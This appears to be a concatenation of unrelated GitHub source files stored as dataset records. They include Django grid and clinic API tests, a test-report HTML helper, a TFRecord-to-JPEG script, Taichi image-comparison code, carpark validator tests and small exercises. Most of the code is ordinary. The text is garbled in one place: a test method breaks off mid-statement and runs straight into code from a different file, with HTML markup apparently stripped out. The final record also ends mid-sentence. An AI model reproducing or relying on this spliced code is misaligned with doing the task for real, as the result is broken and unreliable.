self._add_row(self.grid.supertag, {'name': conf_name, 'date': '2012-06-30'}, after_id=self.hash1)\n\n after_pageevent = PageEvent.objects.filter(event_type=EventTypes.edit, page=self.grid).count()\n self.assertEqual(before_pageevent + 1, after_pageevent, 'Must have created 1 page event')\n PageEvent.objects.filter(event_type=EventTypes.edit, page=self.grid)[before_pageevent]\n grid = Grid.objects.get(id=self.grid.id)\n data_updated_at2 = grid.modified_at\n self.assertNotEqual(data_updated_at1, data_updated_at2, 'data_updated_at must have changed')\n new_hash = grid.access_data[1][HASH_KEY]\n self.assertEqual(len(grid.access_data), 3, 'Must be 3 data rows')\n self.assertEqual(grid.access_idx[self.hash1] + 1, grid.access_idx[new_hash], 'Must be next to hash1')\n field = grid.access_data[grid.access_idx[new_hash]]\n self.assertEqual(field['name']['raw'], conf_name, 'Name must be conf_name')\n\n self._add_row(\n self.grid.supertag,\n {'name': 'Anton Chaporgin Yandex Main Programmer', 'date': '2012-06-30 14:46:00'},\n expected_status_code=409,\n )\n\n grid = Grid.objects.get(id=self.grid.id)\n self.assertEqual(len(grid.access_data), 3, 'The data rows must not have been changed')\n\n def test_edit_action_POST(self):\n self._create_gorilla_grids()\n\n grid = Grid.objects.get(id=self.grid.id)\n data_updated_at1 = grid.modified_at\n\n time.sleep(1)\n before_pageevent = PageEvent.objects.filter(event_type=EventTypes.edit, page=self.grid).count()\n\n self._edit_row(\n self.grid.supertag,\n self.hash,\n {\n 'name': 'lifestyle for you',\n 'date': '2011-06-30',\n },\n )\n\n grid = Grid.objects.get(id=self.grid.id)\n data_updated_at2 = grid.modified_at\n self.assertNotEqual(data_updated_at1, data_updated_at2, 'Must have changed data_updated_at')\n data = grid.access_data[grid.access_idx[self.hash]]\n self.assertEqual(data['name']['raw'], 'lifestyle for you', \"Code must change \\\"name\\\" field\")\n self.assertEqual(data['date']['raw'], '2011-06-30', \"Code must change \\\"date\\\" field\")\n after_pageevent = PageEvent.objects.filter(event_type=EventTypes.edit, page=self.grid).count()\n self.assertEqual(before_pageevent + 1, after_pageevent, 'Must have created 1 page event')\n PageEvent.objects.filter(event_type=EventTypes.edit, page=self.grid)[before_pageevent]\n\n self._edit_row(\n self.grid.supertag,\n self.hash,\n {\n 'name': 'Chapson is a bad guy',\n 'date': '2011/07/06',\n },\n expected_status_code=409,\n )\n\n grid = Grid.objects.get(id=self.grid.id)\n data = grid.access_data[grid.access_idx[self.hash]]\n self.assertNotEqual(data['date'], '2011-07-06', 'Date must not have been changed')\n\n self._edit_row(\n self.grid.supertag,\n self.hash,\n {\n 'date': '2011-06-30',\n },\n )\n\n self._edit_row(\n self.grid.supertag,\n self.hash,\n {\n 'is_done': '',\n },\n )\n\n def test_remove_action(self):\n self._create_gorilla_grids()\n\n grid = Grid.objects.get(id=self.grid.id)\n data_updated_at1 = grid.modified_at\n access_data = self.grid.access_data\n time.sleep(1)\n before_pageevent = PageEvent.objects.filter(event_type=EventTypes.edit, page=self.grid).count()\n self._remove_row(self.grid.supertag, self.hash)\n self._remove_row(self.grid.supertag, self.hash1)\n after_pageevent = PageEvent.objects.filter(event_type=EventTypes.edit, page=self.grid).count()\n self.assertEqual(before_pageevent + 1, after_pageevent, 'Must have created 1 page event')\n PageEvent.objects.filter(event_type=EventTypes.edit, page=self.grid)[before_pageevent]\n grid = Grid.objects.get(id=self.grid.id)\n data_updated_at2 = 
grid.modified_at\n self.assertNotEqual(data_updated_at1, data_updated_at2, 'Must have changed data_updated_at')\n self.assertTrue(len(grid.access_data) == 0, 'Must be no data')\n # self.failUnless(len(grid.access_idx.keys()) == 0, \"Must be no idxes\")\n grid.access_data = access_data\n grid.save()\n\n def test_bad_structure(self):\n self._create_gorilla_grids()\n\n grid = Grid.objects.get(id=self.grid.id)\n grid.change_structure(BAD_STRUCTURE)\n self.assertTrue(''\n return u'{}\\n{}'.format(jquery_script, content)\n\n def href(title, url):\n return u'{title}'.format(url=url, title=title)\n\n def div(content):\n return u'
{}
'.format(content)\n\n st_links = u'
\\n'.join([href(url if len(url) < MAXLEN else title, url) for title, url in title_url_tuples])\n link_to_current_report_script = u''''''\n\n return body(div(u'{}\\n{}'.format(st_links, link_to_current_report_script)))\n\n\n\n\n\n# Методы для работы с кишками аллюр репорта\n\n# def current_allure_testcase():\n# if allure.MASTER_HELPER.get_listener():\n# return allure.MASTER_HELPER.get_listener().test\n# else:\n# raise utils.TestsError(u'Trying to use allure functionality without active plugin. Contact igogor@')\n# None\n\n\ndef add_feature(testcase, feature):\n pass\n # testcase.labels.append(TestLabel(name=Label.FEATURE, value=feature))\n\n\nclass LogStep(object):\n _MARKS = []\n\n @staticmethod\n def level():\n return len([mark for mark in LogStep._MARKS if mark])\n\n def __init__(self, allure_step, to_log):\n self.allure_step = allure_step\n self.to_log = to_log\n\n def __enter__(self):\n LogStep._MARKS.append(self.to_log)\n return self.allure_step.__enter__()\n\n def __exit__(self, exc_type, exc_val, exc_tb):\n LogStep._MARKS.pop()\n return self.allure_step.__exit__(exc_type, exc_val, exc_tb)\n\n # def _current_allure_level():\n # igogor: эта логика полагается на то что запустились с активным плагином аллюра. Поэтому убрал, но припасу.\n # steps = current_allure_testcase().steps if current_allure_testcase() else []\n #\n # level = 0\n # while steps and not steps[-1].stop:\n # level += 1\n # steps = steps[-1].steps\n # return level\n\n# def _mark_next_step(mark):\n# global STEP_MARKS\n# current_level = _current_allure_level()\n# if current_level < len(STEP_MARKS):\n# STEP_MARKS = STEP_MARKS[:_current_allure_level()]\n# elif current_level > len(STEP_MARKS):\n# raise utils.TestsError('Error in calculating log level. Contact igogor@')\n# STEP_MARKS.append(mark)\n","repo_name":"Alexander-Berg/2022-tests-examples","sub_path":"billing/balance_tests/btestlib/reporter.py","file_name":"reporter.py","file_ext":"py","file_size_in_byte":17855,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"19075382367","text":"import math\n\n\ndef _info_about_me():\n \"\"\"\n info about author\n \"\"\"\n print(\"The author of this programm is Andrew Pozhylenkov Group K-10 Variant 20.\")\n print(\"This programm calculates the value of the expression by given x.\")\n\ndef f(x):\n \"\"\"\n f(x) function calculates the expression\n \"\"\"\n result = math.cos(22/55) - 2 * math.pi + \\\n 54 * math.e * 13 / ((x - 4) * (x + 10)) - \\\n 11 * math.cos(x + 9) + 13 / (x - 5)\n\n return result\n\ndef _domain(x):\n \"\"\"\n _domain(x) function checks the domain of the expression\n \"\"\"\n return x!=4 and x!=-10 and x!=5\n\ndef main():\n \"\"\"\n main() function gathers all auxiliary functions together and does exception checking\n \"\"\"\n \n _info_about_me()\n\n try:\n x = float(input(\"Enter x (!= 4, -10, 5): \"))\n print (\"***** do calculations ...\", end=\" \")\n\n if _domain(x):\n result = f\"{f(x):.8f}\"\n else:\n result = \"undefined\"\n\n print (\"done\")\n print (f\"for x = {x:.6f}\")\n print (f\"result =\", result)\n\n except (ValueError, EOFError):\n print (\"wrong input\")\n except KeyboardInterrupt:\n print (\"\\nYou finished the program\")\n\nmain()","repo_name":"McWared/university","sub_path":"Labs/Lab1/lab1_main.py","file_name":"lab1_main.py","file_ext":"py","file_size_in_byte":1201,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"34488767718","text":"\"\"\"\nTest Clinic relevant 
APIs.\n\"\"\"\nfrom random import randint\n\nfrom rest_framework.test import APITestCase\nfrom rest_framework.test import APIRequestFactory\nfrom rest_framework.authtoken.models import Token\nfrom django.contrib.auth import get_user_model\n\nfrom tests.test_users.factories import UserFactory\nfrom users.clinics.views import ClinicPublicDetail\nfrom users.clinics.models import ClinicProfile\n\n\nclass ClinicAPITest(APITestCase):\n def setUp(self):\n self.factory = APIRequestFactory()\n self.view = ClinicPublicDetail.as_view()\n self.uri = '/clinics/'\n self.user = self.setup_clinic_user()\n self.token = Token.objects.create(user=self.user)\n self.token.save()\n self.data = {\n \"display_name\": \"晶華美醫診所\",\n \"services_raw\": [\"service_1\"],\n \"instagram_url\": \"http://my-insta-2.com\",\n \"branches\": [\n {\n \"branch_name\": \"總店erin\",\n \"place_id\": \"ChIJ004m5WipQjQRmBN9dV20Vj412345\",\n \"is_head_quarter\": True,\n \"address\": \"台北市中山區中山北路二段39巷2-2號3F\",\n \"address_help_text\": \"捷運淡水信義線中山站3號出口\",\n \"region\": \"台北市\",\n \"locality\": \"中山區\",\n \"phone\": \"+886225111000\",\n \"er\": 123\n }\n ]\n }\n\n @staticmethod\n def setup_clinic_user():\n User = get_user_model()\n user = User.objects.create_user(\n 'test',\n email='testuser@test.com',\n password='test',\n user_type='clinic'\n )\n user.save()\n objs = ClinicProfile.objects.all()\n clinic_profile_obj = ClinicProfile.objects.get(user_id=str(getattr(user, '_id', '')))\n # TODO: code should make this association automatically\n user.clinic_uuid = clinic_profile_obj.uuid\n user.save()\n return user\n\n def test_list_a_clinic(self):\n \"\"\"\n Test GET /clinics/\n :return:\n \"\"\"\n response = self._call_clinic_detail_api(\"GET\")\n # print(\"get response\", response.data)\n self.assertEqual(response.status_code, 200,\n 'Expected Response Code 200, received {0} instead.'\n .format(response.status_code))\n\n def test_update_clinic(self):\n \"\"\"\n Test PUT /clinics/ on non-nested fields\n :return:\n \"\"\"\n self.data[\"instagram_url\"] = \"http://my-insta-3.com\"\n response = self._call_clinic_detail_api(\"PUT\")\n clinic_obj = ClinicProfile.objects.get(uuid=self.user.clinic_uuid)\n\n self.assertEqual(response.status_code, 200)\n self.assertEqual(clinic_obj.instagram_url, self.data[\"instagram_url\"])\n\n def test_update_clinic_branch(self):\n \"\"\"\n Test PUT /clinics/ on nested field\n :return:\n \"\"\"\n self.data[\"branches\"][0][\"branch_name\"] = \"new-branch-name\"\n response = self._call_clinic_detail_api(\"PUT\")\n clinic_obj = ClinicProfile.objects.get(uuid=self.user.clinic_uuid)\n\n # print(\"get response\", response.data, response.data[\"branches\"][0][\"branch_name\"])\n self.assertEqual(response.status_code, 200)\n self.assertEqual(clinic_obj.branches[0].branch_name, self.data[\"branches\"][0][\"branch_name\"])\n\n def test_have_existing_branch_and_add_new_branch(self):\n \"\"\"\n Test PUT /clinics/\n Create a new branch when there's an existing branch\n :return:\n \"\"\"\n\n response = self._call_clinic_detail_api(\"PUT\")\n self.assertEqual(response.status_code, 200)\n\n place_uuid_new = str(randint(0, 10000))\n self.data[\"branches\"][0][\"place_id\"] = place_uuid_new\n self.data[\"branches\"][0][\"branch_name\"] = \"a new branch\"\n self.assertEqual(response.status_code, 200)\n response = self._call_clinic_detail_api(\"PUT\")\n\n clinic_obj = ClinicProfile.objects.get(uuid=self.user.clinic_uuid)\n self.assertEqual(response.status_code, 200)\n self.assertTrue(len(clinic_obj.branches) == 2)\n 
self.assertEqual(clinic_obj.branches[-1].place_id, place_uuid_new)\n\n def test_add_two_new_clinic_branch(self):\n \"\"\"\n Test PUT /clinics/ on nested field\n :return:\n \"\"\"\n # add a new branch\n place_uuid_new = str(randint(0, 10000))\n self.data[\"branches\"].append(self.data[\"branches\"][0].copy())\n self.data[\"branches\"][1][\"place_id\"] = place_uuid_new\n self.data[\"branches\"][1][\"branch_name\"] = \"a new branch\"\n response = self._call_clinic_detail_api(\"PUT\")\n clinic_obj = ClinicProfile.objects.get(uuid=self.user.clinic_uuid)\n # print(clinic_obj.branches)\n\n self.assertEqual(response.status_code, 200)\n self.assertTrue(len(clinic_obj.branches) == 2)\n self.assertEqual(clinic_obj.branches[-1].place_id, place_uuid_new)\n\n def test_anonymous_put_permission_denial(self):\n \"\"\"\n Test PUT /clinics/ w/ non authenticated user\n :return:\n \"\"\"\n response = self._call_clinic_detail_api(\"PUT\", token_key=\"123\")\n\n self.assertEqual(response.status_code, 401,\n 'Expected Response Code 401, received {0} instead.'\n .format(response.status_code))\n\n def test_non_owner_put_permission_denial(self):\n \"\"\"\n Test PUT /clinics/ w/ authenticated but not clinic owner user\n :return:\n \"\"\"\n # create a random, non-clinic user\n random_user = UserFactory.create()\n token = Token.objects.create(user=random_user)\n token.save()\n\n response = self._call_clinic_detail_api(\"PUT\", token_key=token.key)\n self.assertEqual(response.status_code, 403,\n 'Expected Response Code 401, received {0} instead.'\n .format(response.status_code))\n\n def test_create_then_update_services_raw(self):\n \"\"\"\n Test PUT /clinics/ on nested field\n :return:\n \"\"\"\n #self.data[\"branches\"][0][\"branch_name\"] = \"new-branch-name\"\n response = self._call_clinic_detail_api(\"PUT\")\n clinic_obj = ClinicProfile.objects.get(uuid=self.user.clinic_uuid)\n\n print(\"get response\", response.data, response.data[\"branches\"][0][\"branch_name\"])\n self.assertEqual(response.status_code, 200)\n self.assertEqual(clinic_obj.services_raw[0], \"service_1\")\n\n self.data[\"services_raw\"] = [\"service_1\", \"service_2\"]\n response = self._call_clinic_detail_api(\"PUT\")\n clinic_obj = ClinicProfile.objects.get(uuid=self.user.clinic_uuid)\n\n print(\"get response\", response.data)\n self.assertEqual(response.status_code, 200)\n self.assertEqual(clinic_obj.services_raw[1], \"service_2\")\n\n def _call_clinic_detail_api(self, verb, data=None, token_key=None):\n \"\"\"\n Helper function to call Clinic detail (/clinics/) API\n :param verb:\n :param data:\n :param token_key:\n :return:\n \"\"\"\n uri = self.uri + str(self.user.clinic_uuid)\n if not data:\n data = self.data\n if not token_key:\n token_key = self.token.key\n\n if verb == \"PUT\":\n request = self.factory.put(uri, data, HTTP_AUTHORIZATION='Token {}'.format(token_key))\n elif verb == \"GET\":\n request = self.factory.get(uri)\n\n response = self.view(request, uuid=str(self.user.clinic_uuid))\n return response\n","repo_name":"hchings/psg_mvp_backend","sub_path":"psg_mvp_backend/backend/tests/test_users/test_clinic_api.py","file_name":"test_clinic_api.py","file_ext":"py","file_size_in_byte":7679,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"17379749103","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[1]:\n\n\n# ### 5 Classes\n# #Normal\n# #Benign Mass\n# #Benign Calcification\n# #Malignant Mass\n# #Malignant Calcification\n\n# In[1]:\n\n\nimport numpy as np\nimport pandas as 
pd\nimport tensorflow as tf\nimport matplotlib.pyplot as plt\nimport os\nfrom scipy.misc import imsave\n\n\n# In[9]:\n\n\ndef read_and_decode_single_example(filenames):\n filename_queue = tf.train.string_input_producer(filenames, num_epochs=1)\n\n reader = tf.TFRecordReader()\n\n _, serialized_example = reader.read(filename_queue)\n # The serialized example is converted back to actual values.\n # One needs to describe the format of the objects to be returned\n features = tf.parse_single_example(\n serialized_example,\n features={\n # We know the length of both fields. If not the\n # tf.VarLenFeature could be used\n 'label': tf.FixedLenFeature([], tf.int64),\n 'image': tf.FixedLenFeature([], tf.string)\n })\n\n # now return the converted data\n label = features['label']\n image = tf.decode_raw(features['image'], tf.uint8)\n image = tf.reshape(image, [299, 299, 1])\n\n # scale the image\n #image = tf.image.per_image_standardization(image)\n\n # random flip image\n image = tf.image.random_flip_left_right(image)\n image = tf.image.random_flip_up_down(image)\n\n #image = tf.image.random_brightness(image, max_delta=10)\n #image = tf.image.random_contrast(image, lower=0.2, upper=1.8)\n\n return label, image\n\n\n# In[10]:\n\n\nlabel, image = read_and_decode_single_example([\"training10_0.tfrecords\", \"training10_1.tfrecords\", \"training10_2.tfrecords\", \"training10_3.tfrecords\", \"training10_4.tfrecords\"])\n\nimages_batch, labels_batch = tf.train.batch([image, label], batch_size=64, capacity=2000)\n\nglobal_step = tf.Variable(0, trainable=False)\n\n\ndest_dir = \"TF_JPG\"\nif not os.path.exists(dest_dir):\n os.mkdir(dest_dir)\nif not os.path.exists('dest_dir/0'):\n os.mkdir(os.path.join(dest_dir, \"0\"))\nif not os.path.exists('dest_dir/1'):\n os.mkdir(os.path.join(dest_dir, \"1\"))\nif not os.path.exists('dest_dir/2'):\n os.mkdir(os.path.join(dest_dir, \"2\"))\nif not os.path.exists('dest_dir/3'):\n os.mkdir(os.path.join(dest_dir, \"3\"))\nif not os.path.exists('dest_dir/4'):\n os.mkdir(os.path.join(dest_dir, \"4\"))\n\ntotal_images = 55890\n\nwith tf.Session() as sess:\n sess.run(tf.global_variables_initializer())\n sess.run(tf.local_variables_initializer())\n\n coord = tf.train.Coordinator()\n threads = tf.train.start_queue_runners(coord=coord)\n\n counter = 0\n while counter < total_images:\n la_b, im_b = sess.run([labels_batch, images_batch])\n\n # go through each image in the batch and save it to a directory depending on its class\n for image, label in zip(im_b, la_b):\n # create the filename from the counter so each image has a distinct name\n filename = str(counter) + \".jpg\"\n\n # put the image in a directory according to its label\n image_dir = os.path.join(dest_dir, str(label))\n\n # reshape the image\n image = image.reshape((299,299))\n\n # save the image\n imsave(os.path.join(image_dir, filename), image)\n\n counter += 1\n coord.request_stop()\n\n # Wait for threads to stop\n coord.join(threads)\n\n\n# In[ ]:\n","repo_name":"Staritino/Deep-Learning-for-Breast-Cancer-Prediction","sub_path":"Tfrecords_to_jpg.py","file_name":"Tfrecords_to_jpg.py","file_ext":"py","file_size_in_byte":3340,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"2062431639","text":"# -*- coding: utf-8 -*-\n\nimport ingestor\nimport logging\nimport requests\nimport quandl\n\nfrom ingestor import IngestorItf \nfrom processor import ProcessorItf \nfrom exporter import ExporterItf \n\n\n\nclass OrchestratorIpe( object ):\n \"\"\"Implementation of an 
orchestrator for a standardized Ingest Procell Export process,\n The class is a demo with bare minimum fringes.\"\"\"\n\n def __init__(self, ingestor, processor, exporter):\n self.logger = logging.getLogger(__name__)\n if not isinstance(ingestor, IngestorItf):\n raise ValueError('first argument must be a IngestorItf')\n self.ingestor = ingestor\n if not isinstance(processor, ProcessorItf):\n raise ValueError('second argument must be a ProcessorItf')\n self.processor = processor\n if not isinstance(exporter, ExporterItf):\n raise ValueError('third argument must be a ExporterItf')\n self.exporter = exporter\n\n\n def doIpe(self, ts_name):\n # Ingest data\n try: # recoverable failures are handled by the connector using exponential backoff\n data = self.ingestor.get_data(ts_name);\n except (requests.exceptions.Timeout,\n requests.exceptions.ConnectionError) as e:\n self.logger.info('Exceded number of attempts on recoverable failure', exc_info=True)\n raise\n except (quandl.errors.quandl_error.AuthenticationError,\n requests.exceptions.TooManyRedirects) as e:\n self.logger.info('Unrecoverable failure', exc_info=True)\n raise\n\n # process data\n data = self.processor.process(data,0)\n\n # Export data\n jsonData = self.exporter.export_data(ts_name, data)\n\n return jsonData;\n\n","repo_name":"ringhiera/butterwire","sub_path":"butterwire/orchestrator.py","file_name":"orchestrator.py","file_ext":"py","file_size_in_byte":1611,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"17354204701","text":"# -*- coding: utf-8 -*-\n\n# -- stdlib --\nfrom pathlib import Path\nimport logging\nimport os\nimport shutil\nimport tempfile\nimport types\n\n# -- third party --\nimport numpy as np\nimport taichi as ti\n\n# -- own --\nfrom .common import register\nfrom args import options, parser\nfrom exceptions import Failed\n\n# -- code --\nparser.add_argument('--generate-captures', action='store_true')\nparser.add_argument('--save-compare-dir', type=str, default=os.getcwd() + '/bad-compare')\n\n# def _get_gaussian_coef(radius):\n# from math import erfc\n# a = 3.0 / radius * 0.707106781\n# f = lambda x: 0.5*erfc(-x*a)\n# l = [f(0.5 + i) - f(-0.5 + i) for i in range(radius+1)]\n# l = [i for i in l if i>0.01]\n# l = list(reversed(l[1:])) + l\n# s = sum(l)\n# l = [i/s for i in l]\n# return l\n\n\nGAUSSIAN_COEFF = [\n 0.01449797497581252,\n 0.04928451699227458,\n 0.11807162656393803,\n 0.19941115896256947,\n 0.23746944501081074,\n 0.19941115896256947,\n 0.11807162656393803,\n 0.04928451699227458,\n 0.01449797497581252,\n]\n\n\n@ti.kernel\ndef rmse(a: ti.template(), b: ti.template()) -> ti.f32:\n assert a.shape == b.shape\n acc: ti.f32 = 0\n for i, j in a:\n v = a[i, j] - b[i, j]\n acc += (v * v).sum()\n return ti.sqrt(acc / a.shape[0] / a.shape[1])\n\n\n@ti.kernel\ndef sum_difference(a: ti.template(), b: ti.template()) -> ti.i32:\n assert a.shape == b.shape\n acc: ti.i32 = 0\n for i, j in a:\n for k in ti.static(range(3)):\n v: ti.i32 = a[i, j][k] - b[i, j][k]\n acc += ti.abs(v)\n return acc\n\n\n@ti.kernel\ndef pixel_count(a: ti.template(), b: ti.template()) -> ti.i32:\n assert a.shape == b.shape\n acc: ti.i32 = 0\n for i, j in a:\n if any(a[i, j] != b[i, j]):\n acc += 1\n return acc\n\n\n@ti.kernel\ndef gaussian_blur(a: ti.template(), aux: ti.template()):\n assert a.shape == aux.shape\n for i, j in a:\n acc = ti.Vector([0.0, 0.0, 0.0])\n for k in ti.static(range(-4, 5)):\n acc += GAUSSIAN_COEFF[k + 4] * a[i, j+k]\n aux[i, j] = ti.cast(acc, ti.i16)\n\n for i, j 
in a:\n acc = ti.Vector([0.0, 0.0, 0.0])\n for k in ti.static(range(-4, 5)):\n acc += GAUSSIAN_COEFF[k + 4] * aux[i+k, j]\n a[i, j] = ti.cast(acc, ti.i16)\n\n\n@ti.kernel\ndef naive_downscale(img: ti.types.ndarray(dtype=ti.math.vec4), downscaled: ti.types.ndarray(dtype=ti.math.vec4)):\n for i, j in downscaled:\n acc = ti.Vector([0.0, 0.0, 0.0, 0.0])\n for k in ti.static(range(2)):\n for l in ti.static(range(2)):\n acc += img[i * 2 + k, j * 2 + l]\n downscaled[i, j] = ti.cast(acc / 4, ti.u8)\n\n\nismodule = lambda obj, name: isinstance(obj, types.ModuleType) and obj.__name__ == name\n\n# -- code --\ndef capture(gui, path):\n if gui is None:\n return\n\n if isinstance(gui, ti.ui.Window):\n gui.save_image(str(path))\n elif isinstance(gui, ti.GUI):\n gui.core.screenshot(str(path))\n elif ismodule(gui, 'matplotlib.pyplot'):\n import matplotlib.pyplot as plt\n plt.savefig(str(path))\n plt.close()\n elif ismodule(gui, 'cv2'):\n import cv2\n cv2.imwrite.orig(str(path), cv2._imshow_image)\n\n\n@register('__reset:matplotlib')\ndef reset_matplotlib():\n try:\n import matplotlib.pyplot as plt\n plt.close()\n except Exception:\n pass\n\n\n@register('capture-and-compare')\ndef capture_and_compare(dry, gui, compare, ground_truth, threshold):\n if dry:\n return\n\n truth_path = Path(ground_truth).resolve()\n if options.generate_captures:\n truth_path.parent.mkdir(parents=True, exist_ok=True)\n logging.getLogger('capture').info(f'Generating {truth_path}')\n capture(gui, truth_path)\n return\n\n td = Path(tempfile.mkdtemp())\n capture(gui, td / 'capture.png')\n\n def save_bad_compare():\n save_dir = Path(options.save_compare_dir)\n save_dir.mkdir(parents=True, exist_ok=True)\n basename, extname = truth_path.name.rsplit('.', 1)\n shutil.copy(truth_path, save_dir / f'{basename}.truth.{extname}')\n shutil.move(str(td / 'capture.png'), save_dir / f'{basename}.capture.png')\n shutil.rmtree(td, ignore_errors=True)\n\n captured = ti.tools.imread(str(td / 'capture.png'))\n truth = ti.tools.imread(str(truth_path))\n if list(captured.shape[:2]) == [i * 2 for i in truth.shape[:2]]:\n # retina, downscale first\n captured = np.ascontiguousarray(captured)\n downscaled = np.ascontiguousarray(np.zeros_like(truth))\n naive_downscale(captured, downscaled)\n captured = downscaled\n elif captured.shape != truth.shape:\n save_bad_compare()\n raise Failed('capture-and-compare shape mismatch!')\n\n f_captured = ti.Vector.field(3, dtype=ti.i16, shape=captured.shape[:2])\n f_truth = ti.Vector.field(3, dtype=ti.i16, shape=truth.shape[:2])\n f_captured.from_numpy(np.ascontiguousarray(captured[:, :, :3]))\n f_truth.from_numpy(np.ascontiguousarray(truth[:, :, :3]))\n\n pixels = f_captured.shape[0] * f_captured.shape[1]\n if compare == 'rmse':\n diff = rmse(f_captured, f_truth)\n if isinstance(threshold, str) and threshold.endswith('%'):\n threshold = float(threshold[:-1]) / 100 * 255\n elif compare == 'sum-difference':\n diff = sum_difference(f_captured, f_truth)\n if isinstance(threshold, str) and threshold.endswith('%'):\n threshold = float(threshold[:-1]) / 100 * pixels * 3 * 255\n elif compare == 'blur-sum-difference':\n f_aux = ti.Vector.field(3, dtype=ti.i16, shape=truth.shape[:2])\n gaussian_blur(f_captured, f_aux)\n gaussian_blur(f_truth, f_aux)\n diff = sum_difference(f_captured, f_truth)\n if isinstance(threshold, str) and threshold.endswith('%'):\n threshold = float(threshold[:-1]) / 100 * pixels * 3 * 255\n elif compare == 'pixel-count':\n diff = pixel_count(f_captured, f_truth)\n if isinstance(threshold, str) and 
threshold.endswith('%'):\n threshold = float(threshold[:-1]) / 100 * pixels\n else:\n raise ValueError(f'Unknown compare method: {compare}')\n\n if diff > threshold:\n save_bad_compare()\n raise Failed(f'capture-and-compare failed! diff({diff}) > threshold({threshold})')\n\n shutil.rmtree(td, ignore_errors=True)\n","repo_name":"taichi-dev/taichi-release-tests","sub_path":"actions/capture.py","file_name":"capture.py","file_ext":"py","file_size_in_byte":6355,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"3"} +{"seq_id":"29256314217","text":"import pytest\nimport unittest.mock as mock\n\nfrom maps.garden.modules.carparks_validator.lib import graph\nfrom maps.garden.modules.carparks_validator.lib.task import (\n ValidationTask, _get_mail_subject, _get_error_report)\nfrom maps.garden.sdk.core import DataValidationWarning, GardenError, Version\nfrom maps.garden.sdk.resources import PythonResource\n\n\nRUN_VALIDATION = \\\n \"maps.garden.modules.carparks_validator.lib.task._run_validation\"\nSEND_REPORT = \\\n \"maps.garden.modules.carparks_validator.lib.task._send_report\"\nUPLOAD_REPORT_TO_SANDBOX = \\\n \"maps.garden.modules.carparks_validator.lib.task.upload_report_to_sandbox\"\n\nDATA_VERSION = \"20010101\"\n\n\ndef run_validation_task(environment_settings):\n dataset_marker = PythonResource(graph.DATASET_MARKER_RESOURCE_NAME)\n dataset_marker.version = Version(properties={\n \"data_version\": DATA_VERSION})\n dataset_marker.load_environment_settings(environment_settings)\n\n validation_marker = PythonResource(graph.VALIDATION_MARKER_RESOURCE_NAME)\n validation_marker.version = Version(properties={\n \"data_version\": DATA_VERSION})\n validation_marker.load_environment_settings(environment_settings)\n\n task = ValidationTask()\n task.load_environment_settings(environment_settings)\n task(dataset_marker, validation_marker)\n\n\n@mock.patch(RUN_VALIDATION)\n@mock.patch(SEND_REPORT)\ndef test_validation_success(\n send_report_mock,\n run_validation_mock,\n environment_settings):\n\n run_validation_mock.return_value = (True, \"report\")\n\n run_validation_task(environment_settings)\n\n run_validation_mock.assert_called_once_with(\n \"[]\\n\",\n \"http://__no_such_carparks_testing_renderer__.yandex.ru\",\n \"http://__no_such_carparks_stable_renderer__.yandex.ru\")\n send_report_mock.assert_called_once_with(\n \"__no_such_smtp_server__.yandex.net\",\n \"garden-modules@yandex-team.ru\",\n [\"__no_such_mail_2__@yandex-team.ru\"],\n _get_mail_subject(\"SUCCEEDED\", DATA_VERSION),\n \"report\")\n\n\n@mock.patch(RUN_VALIDATION)\n@mock.patch(SEND_REPORT)\n@mock.patch(UPLOAD_REPORT_TO_SANDBOX)\ndef test_validation_failure(\n upload_report_to_sandbox_mock,\n send_report_mock,\n run_validation_mock,\n environment_settings):\n\n run_validation_mock.return_value = (False, \"report\")\n upload_report_to_sandbox_mock.return_value = \"https://sandbox\"\n\n with pytest.raises(DataValidationWarning):\n run_validation_task(environment_settings)\n\n upload_report_to_sandbox_mock.assert_called_once_with(\n \"report\", \"carparks_validator\", environment_settings\n )\n run_validation_mock.assert_called_once_with(\n \"[]\\n\",\n \"http://__no_such_carparks_testing_renderer__.yandex.ru\",\n \"http://__no_such_carparks_stable_renderer__.yandex.ru\")\n send_report_mock.assert_called_once_with(\n \"__no_such_smtp_server__.yandex.net\",\n \"garden-modules@yandex-team.ru\", [\n \"__no_such_mail_1__@yandex-team.ru\",\n \"__no_such_mail_2__@yandex-team.ru\"],\n 
_get_mail_subject(\"FAILED\", DATA_VERSION),\n \"report\")\n\n\n@mock.patch(RUN_VALIDATION)\n@mock.patch(SEND_REPORT)\ndef test_validation_error(\n send_report_mock,\n run_validation_mock,\n environment_settings):\n\n err = RuntimeError(\"error\")\n run_validation_mock.return_value = (False, \"report\")\n run_validation_mock.side_effect = err\n\n with pytest.raises(GardenError):\n run_validation_task(environment_settings)\n\n run_validation_mock.assert_called_once_with(\n \"[]\\n\",\n \"http://__no_such_carparks_testing_renderer__.yandex.ru\",\n \"http://__no_such_carparks_stable_renderer__.yandex.ru\")\n send_report_mock.assert_called_once_with(\n \"__no_such_smtp_server__.yandex.net\",\n \"garden-modules@yandex-team.ru\", [\n \"__no_such_mail_1__@yandex-team.ru\",\n \"__no_such_mail_2__@yandex-team.ru\"],\n _get_mail_subject(\"ERROR\", DATA_VERSION),\n _get_error_report(err))\n","repo_name":"Alexander-Berg/2022-tests-examples","sub_path":"maps/tests/test_task.py","file_name":"test_task.py","file_ext":"py","file_size_in_byte":4032,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"8219239242","text":"# Valid PAN format\n# https://www.hackerrank.com/challenges/valid-pan-format/problem\n \nimport re \n\nregex = r'^[A-Z]{5}\\d{4}[A-Z]$'\n\nn = int(input())\nfor _ in range(n):\n texto = input()\n if bool(re.findall(regex, texto)):\n print(\"YES\")\n else:\n print(\"NO\")\n","repo_name":"Bonfim-luiz/HackerRank","sub_path":"HackerRank_Regex/Valid_PAN_format.py","file_name":"Valid_PAN_format.py","file_ext":"py","file_size_in_byte":263,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"22187825351","text":"#dictionaries are indexed by keys, which can be any immutable type;\n# strings and numbers can always be keys.\n#\n# Tuples can be used as keys if they 